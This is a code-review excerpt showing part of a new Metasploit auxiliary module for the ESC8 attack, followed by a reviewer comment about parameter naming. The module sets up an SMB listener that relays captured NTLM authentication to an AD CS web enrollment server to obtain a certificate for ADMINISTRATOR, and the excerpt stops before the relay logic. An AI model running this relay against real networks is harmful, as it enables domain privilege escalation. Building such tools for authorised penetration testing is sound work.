modules/auxiliary/server/capture/esc8_relay.rb

```diff
@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb'
+require 'ruby_smb/gss/provider/ntlm'
+
+class MetasploitModule < Msf::Auxiliary
+  include ::Msf::Exploit::Remote::SMB::Server
+  include ::Msf::Exploit::Remote::SMB::Server::HttpRelay
+
+  def initialize
+    super({
+      'Name' => 'ESC8 Relay: SMB',
+      'Description' => %q{
+      },
+      'Author' => [
+        'bwatters-r7',
+        'jhicks-r7' # query for available certs
+      ],
+      'License' => MSF_LICENSE,
+      'Actions' => [[ 'Relay', { 'Description' => 'Run SMB ESC8 relay server' } ]],
+      'PassiveActions' => [ 'Relay' ],
+      'DefaultAction' => 'Relay'
+    })
+
+    register_options(
+      [
+        OptString.new('ALT_USER', [ true, 'The user to issue the certificate for.', 'ADMINISTRATOR' ]),
+        OptString.new('CERT_TEMPLATE', [ false, 'The user to issue the certificate for.', nil ]),
+        OptString.new('CERT_URI', [ true, 'The URI for the cert server.', '/certsrv/' ]),
+        OptBool.new('QUERY_TEMPLATES', [ true, 'Query certificate templates and print them before attempting to use them', true ]),
+        OptBool.new('QUERY_ONLY', [ true, 'Only use the relay to get a list of templates; do not generate certificates.', false ]),
+        OptAddress.new('SRVHOST', [ true, 'The local host to listen on.', '0.0.0.0' ]),
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 445 ]),
+        OptInt.new('TIMEOUT', [ true, 'Seconds to wait for a response.', 20])
+      ]
+    )
+
+    deregister_options('SMBServerIdleTimeout')
+  end
+
+  def start_service(opts = {})
+    ntlm_provider = HTTPRelayNTLMProvider.new(
+      listener: self
+    )
+
+    # Set domain name for all future server responses
+    ntlm_provider.dns_domain = datastore['SMBDomain']
+    ntlm_provider.dns_hostname = datastore['SMBDomain']
+    ntlm_provider.netbios_domain = datastore['SMBDomain']
+    ntlm_provider.netbios_hostname = datastore['SMBDomain']
+    validate_smb_hash_capture_datastore(datastore, ntlm_provider)
+    opts[:gss_provider] = ntlm_provider
+    super(opts)
+  end
+
+  def on_client_connect(_client)
+    @login_uri = "#{datastore['CERT_URI']}/csertfnsh.asp"
+    @http_timeout = datastore['TIMEOUT']
+    print_good('Received SMB connection on Auth Capture Server!')
+  end
+
+  alias run exploit
+
+  def create_csr(private_key, alt_usr)
```

Comment:
I'm pretty sure that this should be the `cert_template` and not `alt_usr`. Or maybe it is, but how it's written here it's not clear whether that's the user or certificate name field.

Reply:
Done